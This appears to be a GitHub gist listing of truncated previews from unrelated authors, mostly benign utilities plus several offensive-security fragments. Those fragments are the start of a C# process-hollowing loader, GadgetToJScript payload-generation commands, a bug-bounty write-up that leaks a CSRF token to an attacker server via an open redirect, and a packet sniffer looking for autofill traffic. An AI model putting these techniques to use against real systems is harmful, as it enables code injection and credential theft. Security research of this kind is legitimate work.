AHilyard

/*
  This script will import Github labels from an array.  
  Optionally, existing labels can be removed prior to import.
  
  Instructions:
  Go to the labels page for the repo you'd like to import to (https://github.com/user/repo/labels)
  Run the labels exporter script first, if you haven't. (https://gist.github.com/AHilyard/a5b9376d0326fd658a8064d5569791a4)
  Modify this script by pasting your labels in where directed,
  and optionally changing the "removeExisting" variable to true.
  Press Enter

AHilyard

/*
  This script will export Github labels to an array.  
  This array can then be imported using the label importer script.
  
  Instructions:
  Go to the labels page for the repo you'd like to export from (https://github.com/user/repo/labels)
  Paste this script in your console
  Press Enter
  Copy the resultant array into the importer script. (https://gist.github.com/AHilyard/5babebe06c30a48e07d949053e00bd5c)
*/

med0x2e

using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;

namespace Hollowing
{
    public class Loader
    {
        public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe");

rvrsh3ll

# Command to generate HTA code using GadgetsToJScript
GadgetToJScript.exe -w hta

# Command to generate JS code using GadgetsToJScript
GadgetToJScript.exe -w js

# Command to generate VBS code using GadgetsToJScript
GadgetToJScript.exe -w vbs

# Command to generate VBA code using GadgetsToJScript

stefanocoding

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.

CSRF token bug

1. There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
2. User loads https://example.com/?code=VALUE
3. Javascript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user

   GET /verify/VALUE HTTP/1.1
   Host: example.com
   

etiennetremel

Simple WireGuard configuration

1 server, 2 clients

Getting started

Install Wireguard on all machines.

Generate all keys

Barakat

#include <Windows.h>
#include <cassert>

int
main(int argc, char **argv)
{
  (void)argc;
  (void)argv;
  
  // التعليمات مولّدة من هذا الكود:

phansch

NOTE: This is outdated. Check the comments below for more up-to-date forks of this gist.

Improved YARD CHEATSHEET http://yardoc.org

forked from https://gist.github.com/chetan/1827484 which is from early 2012 and contains outdated information.

• Official Getting Started Guide
• Official Tags documentation
• Type naming examples

JoshCheek

Posted here  https://twitter.com/josh_cheek/status/760519587758690304
Previously   https://twitter.com/josh_cheek/status/667501443226558464
Based on     http://algorithmicbotany.org/papers/abop/abop-ch1.pdf

ruby -e 's = "F-F-F-F"; 3.times { s = s.gsub /f/i, "F" => "FF-F-F-F-FF" };
dirs = ["  \e[2D\e[A", "  ", "  \e[2D\e[B", "  \e[4D"].map { |s| s * 2 }
print "\e[H\e[2J\e[60;20H\e[45m" # clear and "center"
s.each_char { |c| c == "F" ? print("\e[45m",dirs[0]) : c == "f" ? print("\e[49m", dirs[0]) : c == "-" ? dirs.rotate!(1) : c == "+" ? dirs.rotate!(-1) : :noop }
puts'

claudijd

# Path setting slight of hand:
$: << File.expand_path("../../lib", __FILE__)
require 'packetfu'
require 'json'

capture_thread = Thread.new do
  cap = PacketFu::Capture.new(:iface => 'lo0', :start => true)
  cap.stream.each do |p|
    pkt = PacketFu::Packet.parse p
    if pkt.payload.include?("executeFillScript")